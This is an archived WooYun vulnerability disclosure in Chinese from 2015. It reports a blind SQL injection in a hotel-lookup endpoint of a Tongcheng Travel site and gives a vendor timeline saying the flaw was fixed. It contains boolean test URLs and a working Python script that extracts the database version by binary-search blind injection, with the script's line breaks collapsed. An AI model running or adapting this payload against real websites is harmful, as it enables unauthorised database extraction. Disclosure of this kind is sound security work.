乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-05-04: 细节已通知厂商并且等待厂商处理中 2015-05-04: 厂商已经确认,细节仅向厂商公开 2015-05-07: 厂商已经修复漏洞并主动公开,细节向公众公开
旗下站点一处sql盲注.
1=1有数据返回
http://www.17u.net/ebookhandler/labelajax.ashx?action=gettejiahotel&cityid=53%20and(1=1)&lat=39.94831&lon=116.2933
1=2没有数据返回:
http://www.17u.net/ebookhandler/labelajax.ashx?action=gettejiahotel&cityid=53%20and(1=2)&lat=39.94831&lon=116.2933
验证脚本:
#coding=utf-8import sys,urllib2import threadingfrom multiprocessing.dummy import Poolfrom multiprocessing.dummy import Lockfrom optparse import OptionParserfrom urllib2 import Request,urlopen,URLError,HTTPErrorimport urllibdef request(URL): user_agent = { 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10' } req = urllib2.Request(URL, None, user_agent) try: request = urllib2.urlopen(req, timeout=10) except Exception: return 'Runtime Error' return request.read()def binary_sqli(left, right, index): global result while 1: mid = (left + right)/2 if mid == left: lock.acquire() result[index-1]= chr(mid) sys.stdout.write('\r%s' % '@@version: '+''.join(result)) sys.stdout.flush() lock.release() break payload = "(case when (ascii(substring(@@version,%s,1))<%s) then 53 else 0 end)" % (index, mid) html = request('http://www.17u.net/ebookhandler/labelajax.ashx?action=gettejiahotel&lat=39.94831&lon=116.2933&cityid='+urllib.quote(payload)) verify = '8a1e3931bba8427eb6409a6d7e80a4ee.jpg' if verify in html: right = mid else: left = middef multi_run_wrapper(args): return binary_sqli(*args) if __name__ == '__main__': result=list('*'*80) lock=Lock() args = [] for i in range(1,80): args.append((32, 127, i)) pool = Pool(5) out = pool.map(multi_run_wrapper, args) pool.close() pool.join()
你懂的.
危害等级:高
漏洞Rank:13
确认时间:2015-05-04 12:38
感谢关注同程旅游
2015-05-07:已修复,切了软WAF,请洞主回一下联系方式。